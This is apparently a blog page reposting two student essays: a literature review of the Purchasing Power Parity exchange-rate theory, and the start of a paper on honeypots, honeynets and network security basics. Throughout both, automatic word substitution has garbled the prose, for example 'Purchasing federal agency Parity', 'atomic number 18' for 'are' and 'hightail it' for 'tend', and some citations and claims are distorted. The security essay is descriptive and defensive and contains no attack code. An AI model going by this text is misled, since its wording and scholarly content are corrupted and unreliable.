Thursday, June 6, 2019
Purchasing Power Parity; Does It Exist Essay Example for Free
Purchasing federal agency Parity Does It Exist Essay doorway The Purchasing Power Parity article of belief is perhaps one of the approximately controversial financial theories. Over the years, it has had its ebbs and flows, with proponents expositing several mathematical and statistical formula to transplant the speculation, fleck critics energize severally condemned the utility of the conjecture however, according to Belassa1 the doctrine has managed to survive nevertheless.Belassa argues that, though in somewhat ambiguous terms, the doctrine has been invoked as previous(predicate) as during the Napoleonic wars, the christening and definition of the doctrine came from Prof. Gustav Cassel during the First World War and was popularized after the Second World War. The author further posits that interests in the possible action hightail it to be invoked when existing transforms judge were thought to be unrealistic and there was, therefore, a search for what is consi dered equilibrium order2. Perhaps one of the controversies that have build up around the Purchasing Power Parity starts with the issue of definition. Different authors tend to come up with their own definition ( variance) of the conjecture, and as a extend, the supposition has come to mean contrary things to different authors3. Before looking at some of the conceptualizations of the possibleness that has generated over time, it is pertinent, to first examine the theory as was professed by its author Prof. Gustav Cassel. Bunting4 presents the first exposition of the theory in Casselss Money and Foreign commute after 1914, which he said was one of the earliest and scoop score of the theory by the author. Bunting explains that the concept of demoraliseing billet para was borne out of the need to establish what chanced step in rates in Europe after the era of gold bill was gone, that is, when national currencies were on inconvertible basis. On this basis, Cassel explain s that considering the fact that the primary reason a countrys money is in demand in a contrasted country is the need to purchase goods produced in that country. Thus, when normal, unrestricted foxiness amongst two countries have been formal over time, the tack rates become fixed relative to the buy post of each silver domestically, and as long as this domestic buying violence of the currencies do not change, nothing lead happen to the central rates5.Further, the theory states that when the currencies of these countries undergo inflation, the the normal rate of switch ordain be adjoin to the old rate multiplied by the quotient of the degree of inflation in the one country and in the other6. While this explanation describes the basic systema skeletale of the theory, there have been several adjustments and modifications of the meanings and concept of the theory as several authors tend to strengthen or criticize it. Some of these adjustments to the meaning of the theory will suffice to buttress this point. Everett and his colleagues7 attempting to measure currency strengths and weakness with the get powerfulness para concept, posited that as long as there is unrestricted trades, tack rates of currencies tend to obey the buying power of the currencies. In this regard, they succinctly conceive the theory to mean thereof regardless of how currencies atomic number 18 denominated, when adjusted for units all currencies tend to command the same basket of goods8. This definition is similar to that adopted by Klein et al.9, who likened the acquire power resemblance doctrine to the law of One Price with the explanation that an identical good (or service) would command the same harm, measured in a attached numeraire system, all over the trading world10. Belassa, however, gave a more elaborate explanation of the purchasing power doctrine, differentiating between the relative and unattack subject interpretations of the theory. According to him, th e absolute pas seul of purchasing power simile theory argues that when purchasing power parities argon metric as a ratio of consumer goods prices for whatever pair of countries, the result reflects the equilibrium rates of exchange.On the other hand, the relative version of the theory affirms that, when comp bed to a block when equilibrium rates prevailed, changes in the relative prices of goods would indicate the necessary adjustments in exchange rates11. In a sense, one notify infer from these definitions that the absolute version of the theory seeks to establish equilibrium exchanges rates between any pair of countries based on purchasing power of their currencies, while the relative version intends to measure the over and undervaluation of currencies at any period in time12. Despite the controversies surrounding the validity and utility of this theory, recently, authors have sought to clothe the doctrine in the garments of respectability and in this regard, several stat istical materials have been presented that more accurately reflects the relationship between power of currencies and exchange rates, as conceived in the theory 13. The conclude of this make-up is, therefore, to examine some of the literatures regarding the theory and perhaps to infer from these, the implications and future research possibilities of the theory.Literature ReviewBalassa, Bela (1964). The Purchasing-Power Parity precept A Reappraisal. Belassa14 apparently belongs to the root word of authors that intend to strengthen the validity and utility of the purchasing power parity doctrine. He begins by first differentiating between absolute and relative versions of the theory, as explained above. He, however, assert that the doctrine as postulated by Cassel tends towards the absolute version when he states that the rate of exchange between two countries will be determined by the quotient between the public levels of prices in the two countries15.Further, he explains that th eory as invoked by another author indicates that the German mark was undervalued against the dollar, while the mark too was overvalued, and the Austrian shilling, Danish crown and Dutch guilder all undervalued, by extending the theory to the currencies of less developed countries, their currencies appears to be undervalued against the dollar. The author contends that the deviation from the imagined exchanges were too a great deal to be caused by errors. In the bid to correct the perceived weakness in the theory, Belassa created a new set for the theory by introducing non-traded goods (services) into the traditional two-country, two-commodity model of the theory. This model of the theory is strengthened by the following assumptions that there is only one limiting factor labor, and ageless input coefficient.Also, under the assumption of constant marginal rates of transformation, countries with relative higher(prenominal) productivity levels will experience higher relative price o f non-traded commodity compared to another. From these propositions, the author posit that income levels play a significant level in the calculation of purchase powers and that purchasing power parities will be more closely related to exchange rates when prices are expressed in terms of wage units. From this equation, the author posit that if we were to assume production of traded goods relative to non-traded goods constitutes the major divagation in international productivity, currencies of country with higher productivity will appear to be overvalued using purchasing power parity calculations. However, if per capita income was to be used as a representative of levels of productivity, the ratio of purchasing power parity to exchange rate will be an increasing reflection of income levels In providing empirical confirmation the proposed relationship between purchasing power parity, exchange rates and income levels, the author argues thus if differences in tastes do not counterbalanc e differences in productive endowments, there will be a design in each country to consume commodities with lower relative prices in larger quantities16 . The result is that the purchasing power of country IIs currency will be undervalued if country Is consumption pattern is used as weights and overestimated if country IIs consumption is used. This is shown in the tables below. The second table above shows the comparison of the cost of household services in the United States and Italy for 1950. The author argue that after conversion at exchange rates, domestic services in Italy seem to cost about one-fifth of their United states price, barber and beauty shops cost one-fourth, laundry and dry cleaning the same cost. In the same vein, purchasing power equivalents for household services was 391 lira at US weights and 165lira at Italian weights. These figures confirm, the author argues, that services (non-traded goods) cost more, relatively, in countries with higher income levels. Thus, it buttresses the relationship between purchasing power parity, exchange rates and income levels.Bunting, H. Frederick (1939). The Purchasing Power Parity Theory Reexamined. Bunting18, while conceding that the purchase power parity doctrine has been severally criticized, further adds his criticism by, according to him, submitting the theory to an improved statistical test. The basis of the cable set forth in this paper is that though the author of the doctrine of purchasing power parity discussed some likely exceptions to the theory, which could account for the differences discover between tangible exchanges rates and parity cipher rates, several other exceptions that render the theory impracticable exists. The author pr proffered an elaborate definition (explanation) of the theory, as conceived by Cassel and the proposed relationship between purchasing power of currencies and their exchange rates. Further, he went on to summarize the major exceptions to the familiar rule int o seven briny points, as discussed by Cassel in his book Money and Foreign transfer later on 1914.Accordingly, he explained that exchange rates are expected to deviate from the calculated rates if, domestic prices fluctuate in relation to one another, out-of-pocket to any series of factors tariffs and/or shipping costs change in relation to those prevalent in the base year used for the calculation obstructions to trade other tariffs and shipping costs becomes operational during the year under consideration sudden devaluation of currency proceeds during the transition period the activities of speculators affect exchange rates governments are in need of unknown exchange, for example to pay international debts and the base year or general price index is not properly selected, as defects in the price index used or the base year could cause prophetic error in calculated rates. In sum, Bunting posits that though these exceptions are many and powerful, they do not fully subsume fact ors/reasons responsible for differences in actual rates and calculated rates. In this regard, the author asserts that the critique of the theory can be simplified by considering problems of price levels and direction of change. On the issue of price level, he argues that, problems with choice of base year and the commodities that should make up the price indices to be used in the calculation shows ambiguity in the theory. First, with base year determination, the author argues that Cassels contention that it is only if we know the exchange rate which represents a certain equilibrium that we can calculate the rate which represents the same equilibrium at an altered value of the mo give the sackary units of the two countries19 i.e. we can only calculate the equilibrium rate now if we know the rate at a particular base year is faulty because there is no such thing in international trades. He argues that the fact that international economic conditions do not persist for long means that a effrontery base year can only be reasonably used to measure relative price changes for only a short period of time. On the commodity prices to be included in the price index, Bunting likewise faults Cassels insistence that general price index should be used, arguing that not all goods are traded internationally. Thus changes in commodities not traded internationally can, therefore, have no effect on foreign countrys evaluation of a countrys currency. Further, on the direction of change, the author argues that Cassels contention that when currencies are not on a convertible specie standard it is parities which determine exchange rates20 tend to overlook the possibility that the direction of change could be the reverse i.e. price levels may be caused by changes in exchange rates.Thus, while Cassel concedes that the actions of speculators could cause changes in exchange rates without necessary price changes there are several other factors that are capable of inducing change in exch ange rates. Bunting mentions the following factors Government monetary policies alterations of central bank rates, stabilization funds, international government loans Private international loans and special(a) considerations such as large corporations transferring their capital holdings from one country to the other to protect their profits, or tourist expenditures and immigration remittances, which both involve the purchase of foreign currencies with no regard for the purchasing power of the currencies involved. Subjecting the purchasing power parity theory to statistical tests, the author presents his result in the graphical form shown below. In the charts below, Franco-American exchange rates were compared for 1920s and 1930s. The solid line represents calculated rates while the broken line labeled no lag represents actual rates. The differences exhibited between the actual and calculated rates for the statistical test constitute discrepancy in the theory. The 1month, 2months a nd 3months lag periods were allowed in the assumption that time should be allowed for changes in purchasing power parities to effect a change in exchange rate, thus the 1-3months lag should show more correlation with the actual rates, however, this was not the suit of clothes. The author concludes that proponents of the theory should simply recognize the fact that the theory as it stand is defective and needs to be re attractived.The authors of this paper proffered answers to criticisms of the validity and utility of the purchasing power parity theory, and especially to the claims that though the theory worked relatively in the 1920s, it failed in the 1970s by some other authors. Davutyan and John21 contend that possible reasons for the apparent failure of the purchasing power theory to predict exchange rates accurately when figures from the 1970s are used could include the fact that relatively to 1920 monetary policies were more set up in the 1970s. They therefore, assert that it is the coordination of monetary policies, not the failure of the purchasing power parity theory that causes conventional statistical tests to reject the validity of purchasing power parity for the 1970s.Providing evidence to support their claims, the authors posit that if we are to assume that there are no obstructions to trade, i.e. all goods are tradable and effective arbitrage refers to the relative version of the purchasing power theory, as explained by Bellassa22 above.In consolidating their argument, the authors contend that purchasing power parity tend to fail under two instances when arbitragers fail to respond to profitable opportunities or when transaction costs and other impediments inhibit trades. However, they contend that the first factor might not be feasible, so the latter appears to be more important. Elucidating on the second factor, Davutyan and John posit that under the assumption of zero transaction costs all goods are tradable, when this assumption is listed, goods could be dual-lane into two categories, tradables with zero transaction costs and non-tradables with high transaction costs. Thus, in the absence of transaction costs, arbitrage keeps relative prices of tradable goods across countries equal, but this is not the case between non-tradables as well as between tradables and non-tradables. Therefore, when there are economic shocks, the equation above holds tradables but not for non-tradables.Furthermore, the authors contend that even with tradables, while the zero transaction costs is convenient in theory, it is not always so in reality. The fact is that relative transaction cost differs between countries and this too, tends to butt in errors into the purchasing power parity calculation, as with the non-tradables. Another source of error in purchasing power calculation, according to the authors, is unequal weights used for calculation.They argue that in the second equation above, the weights in the price index are the same for bot h countries however, using CPI or wholesale price index or GNP deflators would violate the requirement for similar weights and could introduce error into the measurement. To support their claims, the authors present the data in the table below, where R2 and estimate of the regression coefficient supports the argument that purchasing power parity works. Everett24 and his colleagues presented a practical and working model of the purchasing power parity theory and argued that by using this model of the theory to calculate exchange rates, currency strengths and weakness can be measured. Defining purchasing power parity, the authors contend that the primary concept of the theory is that when the sucks of price utensil are unrestricted, exchange rates tend to conform to the purchasing power of currencies. Thus, instead of price levels adjusting to exchange rates, the reverse is the case. In this regard, the authors assert that while this general approximation of the theory applies to a world of rudderless exchange rates, their model of the purchasing power theory can be adapted to a variety of exchange rate regimes, such as managed floats, crawling pegs and fixed exchange rates. In explaining this model of the purchasing power parity, the authors refer to what they called the parity chart. As shown below, the chart is derived thus the horizontal axis measures time from a chosen time of origin the base year while the vertical axis measures two things, one, the difference in the percentage of the purchasing power of currencies and two, the percentage change in the actual exchange rate from the base year. While the dotted line represents the actual/observed exchange rates, the parity (solid) line represents parity (calculated) exchange rates over time. Using the two country model to explain the parity chart, the authors explain that if we assume that there are no restrictions to trade, and the perfect base time, under this scenario, if the change in the purchasing power of country As currency differs from that of country B, the parity line in the chart above will have a positive or negative slope, depending on the sign of the difference between the purchasing power of the currencies under consideration. Further, if actual exchange rates were to be plotted on the same chart, the slope should conform closely to that of the parity line. What can be inferred from this explanation is that the parity line in the chart closely reflects the expected change in exchange rates that should follow changes in the purchasing power of country currencies. To support their claims that the parity chart can be used to measure changes in exchange rates under any type of exchange rate regime, the authors presented empirical results of several currencies with different exchange rate regimes, these included the German mark-a more or less freely floating exchange rate Spanish peseta-a strictly managed exchange rate Colombian peso-a crawling peg currency and South Af rican rand-a fixed exchange rate25. The result for the German mark is presented below The authors explain that the vertical axis measures the percentage deviation from the calculated rate. While the line representing the inflation factor shows a pretty steady rise, in line with the well known fact of relatively lower rates of increases in the West German price level compared with approximately other countries, the line representing the exchange rate, on the other hand, shows no apparent trend, reflecting the fact that the exchange rates of West Germanys trading partners vis--vis the dollar on a trade-weighted basis may have moved in opposite directions. These two factors when compounded, yields the parity line. After presenting empirical results for all the four representative countries listed above, the authors concluded that an indepth interrogation of the parity chart and line indicates that the parity line provides an effective and informed judgment about future currency move ments. Further, that if the parity rate diverges from the actual rate, this indicates that the currency is presently either over- or undervalued, and will therefore have to adjust, the longer the persistence of such a divergence, the more likely that an adjustment will occur soon26. This is another study that attempted to strengthen the validity and utility of the purchasing power parity doctrine. These authors, in this study, posited that purchasing power parity could be used to derive a more effective simulation or projection of world economy. Admitting that the theory has come to mean different thing to different writers, the authors adopted the law of one price definition of the theory, which explains that an identical good or service would command the same price, measured in a given numeraire system, all over the trading world27. The authors further state that though there are several controversial issues about the theory, such as what course of study of goods should be includ ed in the calculation or what time should be used as origin/base in the calculation, they assert that any expand exchange rate modeling system should obey the purchasing power parity rule, in the long run. Statistically estimating the movement of exchange rates in relation to the purchasing power parity principle for the 1970s, the authors presented the following formula According to the authors, this formula states that the U.S. dollar terms, should have a common rate of change across all countries, namely, the U.S. rate of change of export prices28. Thus, if the exchange rates during this time, had moved in accordance with the principle of purchasing power parity, then the estimates ofwould be consistent with the hypothesis of purchasing power parity. Where a =O b = -1.0 c = +1.0 eit =additive random error. Scatter diagrams of the data points of the two equations above are shown below.Conclusively, the authors assert that judging by these statistics, all the regression estimates in the charts above passed significance tests. Thus, it could be deduced that the relationship between purchasing power of currencies and the actual exchange rates was tightest for members of the EMS, but slightly less tight when the UK is included. Based on this evidence, the authors believe that their contention that, on average, purchasing power parity movements approximately reflects actual exchange rates in the 1970s has been adequately justified, and as a result, it could be generalized that calculations of purchasing power parity could be used in predicting movements of exchange rates. John29 proffered answers to criticisms concerning the predictive errors observed with exchange rates calculated from purchasing power parity. They observed that studies carried out by several authors indicate that for several countries, the predictive error of purchasing power parity during the 1970s followed what they referred to as random walk i.e. whatever the deviation between the parity ra te and actual rates observed this month, next month it is likely to increase as decrease. In this regard, the author argued that the basic idea behind the purchasing power parity doctrine is that in the long run, the differences between the parity rates and the actual exchange rates tend to disappear and the tow rates are equated. They argue that, though economic shocks, in whatever guise, could, in the short term, drive the actual rate from the parity rates, but in the absence of new shocks, the price mechanism tend to equate the tow rates, in the long run. Based on this argument, the author contend that predictive errors for purchasing power parity should not fulfil a random walk, instead there should be a gradual decline or increase towards the actual rate. Supporting their claims that predictive errors in purchasing power parity does not perform random walk in the long run the authors presented the results of empirical studies of several countries using data for over cardinal years. Following the same path with paper reviewed above, Yeager30 also sought to strengthen the validity and utility of the purchasing power parity theory. He started off his argument with the basic assumption that people primarily value currencies for what could be bought with it, based on this assumption, he argues, it is safe to presume that in an unrestricted market, people will tend to exchange such currencies for their relative purchasing powers.The author admits that the theory, in its basic form, as stated above, is loose and ambiguous, he posits, however, that the theory performs tow main functions. First, the theory gives an expression of what the equilibrium exchange rates should be for currencies, however crude this rate appears. And two, the theory act like a stabilizing force for exchange rates. Explaining this second function, he assert that when for any reason, actual exchange rates deviate from the equilibrium rates, the theory describes pressures at work tending t o reckon and reverse this random departures from the range of equilibrium rates. The author provides this example to buttress the point made above about the stabilizing powers of the parity theory permit us suppose, for example, that prevailing exchange rates unmistakably undervalue the British pound in relation to the purchasing powers of the pound and of foreign currencies. Foreigners -say Americans- will offer dollars for pounds to buy British goods at bargain prices. Britons will offer relatively few pounds for dollars to buy, American goods at their apparently high prices. Unmatched attempts to sell dollars and buy pounds will bid the exchange rate toward the equilibrium level. In the same light, the author evaluates some of the numerous objections raised about the theory and posits that in most of these objections, the stabilizing pressures aspect of the theory has been mostly ignored. In sum, the author concludes that most of the discrepancies observed in purchasing pow er parity rates are imputable to inappropriate base periods disequilibrium exchange rates (including base-period rates), often imposed by official pegging tariffs, quotas, and other interferences with trade, payments, and exchange rates.31 Wyman32 extends the utility of the purchasing power parity further, by applying the concept of the doctrine to calculating gains or losses incurred by holding foreign items, such as foreign currencies or goods. Relating purchasing power parity to currency changes, the author explain that purchasing power is related to the exchange rates of currencies, in that, differential rates of inflation between, say the United States and a foreign country, influences the exchange rates between the monetary units if each country.Putting this definition into an equation, he states that the calculation of the purchasing power parity can be illustrated thus If the exchange rate between the United States and a foreign country is 20FC = $1 where FC denotes a unit o f foreign currency, if during the year, the US price level index changed from 100 to 110 and that of the foreign country changed from 100 to 120, the purchasing power parity rate can be calculated by determining an adjustment factor that would be applied to the exchange rate. The adjustment factor is calculated ast t = the adjustment factor for period t or (120,100t 110,100) = 1.0909wheret = the price-level ratio in the United States defined as the general price-level index at the end of period t divided by the general price-level index at the beginning of period tt = the price-level ratio in the foreign country defined as the general price-level index at the end of period t divided by the general price-level index at the beginning of period t Explaining this formula, the author assert that when the adjustment factor is applied to the exchange rate, for the example above, result is FC 20x 1.0909 = FC 21.8182=$1. So, if the actual exchange rate at the end of the time t is at th e calculated rate of FC 21.8182 to $1, investors in either country will maintain their purchasing power relative to each other, however, if for example, the exchange rate was to be at FC 22 to $1, FC would have depreciated more than is necessary to maintain the purchasing power parity, and so US investors in need of the foreign currency would have exchanged the currency at a loss. The author went on to establish a multiequation system that can be employed in analyzing potential gains and losses in foreign exchange, based on the purchasing power parity concept.Ruble, L. William (1961). A Comparison of the Parity Ratio with Agricultural lolly Income Measures 1910-1958. journal of Farm Economics, 43(1)101-112. And Stine O. C. (1946). Parity Prices. ledger of Farm Economics, 28(1)301-305. These two works covered a slight different aspect of purchasing power parity. They were focused on the purchasing power of farmers, canvas prices changes in farm and non-farm products, and thus, wha t farmers are paid for their farm products and what they have to pay to buy non-farm products. Stine33 explains that in the years after the first World War, when the purchasing power parity concept was birthed and first applied as measurement in of changes in purchasing power, marked changes in general price levels was observed, as expected, however, it was also observed that farm products declined more rapidly and farther compared to non farm products. As a result, what farmers had to pay for products they buy was considerably different from what they earn from the sells of farm products. Ruble34 load-bearing(a) this line of argument, argues that since the prices received by farmers and prices paid by farmers affect the livelihood and wellbeing of the farming family, the parity ratio provides a good indicator of the standard of living of farmers. Further, contends that the level of the parity ratio is expected to give good indication of the following methods of estimating the stan dard of living of farmersNet money income per capita, per farm, or per worker.Net real income per capita, per farm, or per worker.Income of farmers compared to income of non-farmers on a per capita or per worker basis (the parity income concept) However, data and result of empirical studies was presented to measure the relation between the parity ratio and the well being of farmers suggests that the parity ratio might not indeed properly reflects the general well being of farmers, if the well-being of farmers in general is expressed by the per capita, per farm, or per worker net income, real or money. In arriving at the figures in the table, the parity ratio was correlated separately with the per capita net agricultural income of the farm population, the net income of farm operators from farming per farm, and the net income of farm workers from farming per worker, income from all sources, and deflated by the index of prices paid by farmers for family-living items (1917-19 = 100) abs tract There is no denying the fact that the Purchasing Power Parity doctrine is an important theory in the financial world. It is true that a lot of controversies have been generated about its validity and utility, but it is also true that several authors have been able to categorically prove its validity, and more importantly, utility, in an array of fields. Just as the theory has come to mean different thing to different authors, it has also carved for itself, different functions, depending on the perspective one adopts. It is not surprising, therefore, that authors have been able to apply the doctrine to a number of endeavors, as seen in the reviews above. In its most basic form, the concept argues that people primarily need currencies of other countries for the place of buying goods/commodities of that country. Therefore, people will only be prepared to exchange currencies for its relative worth. Here lies the relationship between purchasing power parity and the exchange rates of currencies i.e. when it is suspected that a currency is under or over valued, market forces will tend to force the rate back to the equilibrium level. symmetry here describes the rate achieved after trades have occurred between two countries, uninterrupted, for a certain period of time and a common exchange rate has been established, as a result. From this very basic understanding of the theory, as proposed by the author Prof. Gustav Cassel, several modifications, adjustments, and extension of the theory have been proposed and proved. For example, Bellasa fine tuned the predictive value of the theory by modifying the basic two-country, two-commodity model, to include considerations for non-traded goods (services) and the per capita income of each country, which, he argues, play crucial role in the purchasing power of currencies.Klein and his colleagues modified the theory and employed it in simulating/projecting changes in world economy Everett and others , also modified the the ory and proved it to be useful in appraising strengths and weaknesses of countries currencies while John showed that the predictive errors in rates calculated with the purchasing power parity concept could be as a result of faults inherent in the calculation methods and data. From the foregoing, one can only infer that purchasing power parity is still an important financial concept. Although, further academic and research efforts should be geared towards resolving some of the objections raised against the theory. It is obvious that criticism of the theory will further help to strengthen it, in the future, as we have seen it done in the past. to the highest degree of the objections raised have been somehow addressed, even if not completely resolved. One can, thus conveniently conclude that with time, the theory might be better fine tuned and become more effective at explaining and predicting exchange rates of currencies.EndnotesBalassa, Bela (1964). The Purchasing-Power Parity Doct rine A Reappraisal.Ibid p.584Klein, R. Lawrence, Shahrokh Fardoust and Victor Filatov (1981). Purchasing Power Parity in median(a) Term Simulation of the World Economy Balassa, Bela (1964)Bunting, H. Frederick (1939). The Purchasing Power Parity Theory ReexaminedBunting (1939) provided almost a word-for-word definition and explanation of the theory as postulated by Cassell. The author gives a better idea of the original theoryIbid p.283Everett, M. Robert, Abraham M. George and Aryeh Blumberg (1980). Appraising Currency Strengths and Weaknesses An Operational Model for Calculating Parity Exchange Rates.Ibid p.80Klein et al., 1981Ibid p.486Belassa, 1964 p.584-585This is personal opinion based on the definition of the absolute and relative PPP proffered by Bellasa, 1964IbidIbidBelassa, 1964 p.585 quoting Cassel in his book Money and Foreign Exchange After 1914.IbidIbid p.587Bunting, H. Frederick (1939). The Purchasing Power Parity Theory Reexamined.Bunting, 1939 p.285 quoting Cassel i n his book Money and Foreign Exchange After 1914.Bunting, 1939 p.288Davutyan, Nurhan and John Pippenger (1985). Purchasing Power Parity Did non Collapse During the 1970sBalassa, 1964Davutyan and John, 1985 p.1151Everett, M. Robert, Abraham M. George and Aryeh Blumberg (1980). Appraising Currency Strengths and Weaknesses An Operational Model for Calculating Parity Exchange Rates.Ibid p.84Ibid p.90Klein, R. Lawrence, Shahrokh Fardoust and Victor Filatov (1981). Purchasing Power Parity in average Term Simulation of the World Economy. p.486Ibid p.487John, Pippenger (1982). Purchasing Power Parity An Analysis of Predictive ErrorYeager, B. Leland (1958). A Rehabilitation of Purchasing-Power ParityIbid p.529Wyman E. Harold (1976). Analysis of Gains or losses from Foreign Monetary Items An Application of Purchasing Power Parity Concepts.Stine O. C. (1946). Parity PricesRuble, L. William (1961). A Comparison of the Parity Ratio with Agricultural Net Income MeasuresBibliographyBalassa, Bel a (1964). The Purchasing-Power Parity Doctrine A Reappraisal. The Journal of Political Economy, Vol. 726 pp. 584-596.Bunting, H. Frederick (1939). The Purchasing Power Parity Theory Reexamined. Southern Economic Journal, Vol. 53. pp. 282-301.Davutyan, Nurhan and John Pippenger (1985). Purchasing Power Parity Did Not Collapse During the 1970s. The American Economic Review, Vol. 755. pp.1151-1158.Everett, M. Robert, Abraham M. George and Aryeh Blumberg (1980). Appraising Currency Strengths and Weaknesses An Operational Model for Calculating Parity Exchange Rates. Journal of planetary Business Studies, Vol. 112. pp. 80-91.John, Pippenger (1982). Purchasing Power Parity An Analysis of Predictive Error. The Canadian Journal of Economics, Vol. 152, pp. 335-346.Klein, R. Lawrence, Shahrokh Fardoust and Victor Filatov (1981). Purchasing Power Parity in Medium Term Simulation of the World Economy. The Scandinavian Journal of Economics, Vol. 83 4 pp. 479-496.Ruble, L. William (1961) . A Comparison of the Parity Ratio with Agricultural Net Income Measures 1910-1958. Journal of Farm Economics, Vol. 431. pp. 101- 112.Stine O. C. (1946). Parity Prices. Journal of Farm Economics, Vol.281. pp.301-305.Wyman E. Harold (1976). Analysis of Gains or Losses from Foreign Monetary Items An Application of Purchasing Power Parity Concepts. The business relationship Review, Vol. 51 3. pp. 545-558.Yeager, B. Leland (1958). A Rehabilitation of Purchasing-Power Parity. The Journal of Political Economy, Vol. 666, pp. 516-530.
Wednesday, June 5, 2019
Analysis of Honeynets and Honeypots for Security
Analysis of Honeynets and honeypots for aegisChapter 1 IntroductionHoneynet is a benignant of a net certificate tool, most of the mesh topology credentials tools we have be passive in nature for case Firew altogethers and IDS. They have the dynamic infobase of available rules and signatures and they operate on these rules. T lid is why anomaly sleuthing is limited only to the set of available rules. Any activity t chapeau is non in alignment with the given rules and signatures goes under the radar un identifyed. honeypots by design whatsoeverows you to unsay the initiative, and trap those bad guys (hackers). This system of rules has no production value, with no certain activity. Any interaction with the honeypot is considered malicious in intent. The combination of honeypots is honeynet. Basic onlyy honeypots or honeynets do not solve the pledge problem hardly offer in underframeation and knowledge that help the system administrator to enhance the overall warrante r of his ne devilrk and systems. This knowledge do-nothing act as an Intrusion get windive work system and utilisationd as input for either(prenominal) early word of advice systems. all over the years seekers have successfully isolated and identified verity of worms work ons use honeypots and honeynets.Honeynets ext arrest the concept of a single honeypot to a upliftedly controlled network of honeypots. A honeynet is a specialized network computer architecture cond in a charge to turn over information Control, Data Capture Data accretion. This architecture builds a controlled network that one apprise control and monitor all kind of system and network activity.1.1 Information SecurityInformation Security is the egis of all sensitive information, electronic or otherwise, which is owned by an individual or an administration. It deals with the preservation of the confidentiality, unity and availability of information. It protects information of organizations from al l kinds of threats to ensure transaction continuity, derogate business damage and maximize the return on investment and business op bearingunities. Information stored is highly confidential and not for public viewing. Through information security we protect its availability, privacy and unity.Information is one of most important assets of monetary institutions. Fortification of information assets is es dis roleial to ascertain and maintain trust between the fiscal institution and its nodes, maintain compliance with the law, and protect the reputation of the institution. Timely and unquestionable information is compulsory to offshoot transactions and support financial institution and customer decisions. A financial institutions earnings and capital give the axe be adversely affected, if information becomes known to unauthorized ploughsh argonies is distorted or is not available when it is call for 15.1.2 intercommunicate SecurityIt is the protection of networks and its fu nction from any unauthorized vex. It includes the confidentiality and integrity of all selective information passing through the network. It also includes the security of all Network devices and all information assets connected to a network as salutary as protection a fixst all kind of known and unknown approachs.The ITU-T Security architecture for Open establishment Interconnection (OSI) enrolment X.800 and RFC 2828 argon the standard financial support defining security services. X.800 divides the security services into 5 categories and 14 specific services which quarter be summarized as panel 1.1 OSI X.800 Summary81. AUTHENTICATIONThe arrogance that the communication entity is the one that it claims to be.Peer Entity AuthenticationUsed in association with a ratiocinative connection to go away confidence in the identity of the entities connected.Data blood AuthenticationIn a connectionless transfer, provides assurance that the source of received entropy is as claimed. 2. ACCESS CONTROLThe proceedion of unauthorized use of a pick (i.e., this service controls who buns have access to a resource, under what conditions access open fire occur, and what those accessing the resource atomic number 18 allowed to do).3. DATA CONFIDENTIALITYThe protection of selective information from unauthorized disclosure. weakennership ConfidentialityThe protection of all user information on a connection.Connectionless ConfidentialityThe protection of all user data in a single data containSelective-Field ConfidentialityThe confidentiality of selected fields inside the user data on a connection or in a single data block.Traffic Flow ConfidentialityThe protection of the information that might be derived from observation of traffic flows.4. DATA INTEGRITYThe assurance that data received argon exactly as send by an authorized entity (i.e., contain no modification, insertion, deletion, or replay).Connection Integrity with RecoveryProvides for the integrity of all user data on a connection and detects any modification, insertion, deletion, or replay of any data inwardly an entire data sequence, with recovery attempted.Connection Integrity with pop knocked out(p) RecoveryAs above, but provides only perception without recovery.Selective-Field Connection IntegrityProvides for the integrity of selected fields inside the user data of a data block transferred over a connection and takes the form of termination of whether the selected fields have been modified, inserted, deleted, or replayed.Connectionless IntegrityProvides for the integrity of a single connectionless data block and whitethorn take the form of undercover work of data modification. Additionally, a limited form of replay detection may be provided.Selective-Field Connectionless IntegrityProvides for the integrity of selected fields at heart a single connectionless data block takes the form of determination of whether the selected fields have been modified.5. NONREPUDIATIONProvides p rotection against denial by one of the entities touch in a communication of having participated in all or part of the communication.Nonrepudiation, Origin consequence that the communicate was sent by the specified party.Nonrepudiation, DestinationProof that the marrow was received by the specified party. 1 8, 9,1.3 The Security Problem remains security personnel fighting an unending battle to secure their digital assets against the invariably increase attacks, verity of attacks and their intensity is increasing day by day. closely of the attacks are detected after the exploitations so in that location should be awareness of the threats and vulnerabilities that hold out in the Internet today.First we have to understand that we cannot say that there exists a perfect secure railroad car or network because the closest we can get to an absolute secure machine is that we unplugged the network cable and index finger supply and put that machine in to a safe. Unfortunately it is not usable in that state. We cannot achieve perfect security and perfect access at the same time. We can only increase the no of doors but we cannot put seawall instead of doors. In field of security we need to find the vulnerably and exploits before they affect us. Honeypot and honeynet provides a invaluable tool to collect information about the behavior of assaulters in order to design and implement dampen defense.In the field of security it is important to note that we cannot simply state that what is the dress hat type of firewall? Absolute security and absolute access are the two chief points. Absolute security and absolute access are inverse to apiece other. If we increase the security access will be decrease. in that respect should be balance between absolute security and absolute defense, access is given without whippy the security.If we compare it to our daily lives we observe not much difference. We are infinitely making decisions regarding what take a chances we a re ready to take. When we step out of our homes we are taking a risk. As we get into a car and drive to our work place there is a risk associated with it too. There is a possibility that something might communicate on the high flair which will make us a part of an accident. When we fly and sit on an airplane we are willing to undergo the take aim of risk which is at par with the heavy amount we are stipendiary for this convenience. It is observed that many people think differently about what an acceptable risk would be and in majority cases they do go beyond this thinking. For interpreter if I am sitting upstairs in my room and have to go to work, I wont take a jump straight out of the window. It might be a faster way but the danger of doing so and the injury I would have to face is much colossaler than the convenience. It is lively for every organization to decide that between the two opposite poles of total security and total access where they need to place themselves. It i s necessary for a insurance policy to articulate this system and then further explain the way it will be enforced with which practices and ways. Everything that is done under the name of security must stringently agree to the policy.1.4 Types of HackerHackers are much often than not divide into two major categories.1.4.1 fateful HatsBlack hat hackers are the biggest threat both internal and away to the IT infrastructure of any organization, as they are consistently challenging the security of coats and services. They are also called crackers, These are the persons who specialize in unauthorized infiltration. There could be Varity of reasons for this type of penetration it could be for profit, for enjoyment, or for political motivations or as a part of a social cause. Such infiltration often involves modification / destruction of data.1.4.2 White HatsWhite hat hackers are similar to black hat hackers but there is a important difference that is white hat hackers do it without a ny criminal intention. Different companies all around the world involve/contact these kinds of persons to test their systems and softwares. They check how secure these systems are and point out any fault they found.These hackers, also known as ethical hackers, These are the persons or security experts who are specialize in penetration testing. These types of people are also known as tiger teams. These experts may use different types of methods and techniques to send out their tests, including social engineering tactics, use of hacking tools, and attempts to bypass security to gain entry into protected areas, but they do this only to find weaknesses in the system8.1.5 Types of AttacksThere are many types of attacks that can be categorized under 2 major categoriesActive Attacks peaceable Attacks1.5.1 Active AttacksActive attacks involve the assailant taking the offensive and directing malicious packets towards its victims in order to gain illegal access of the target machine much 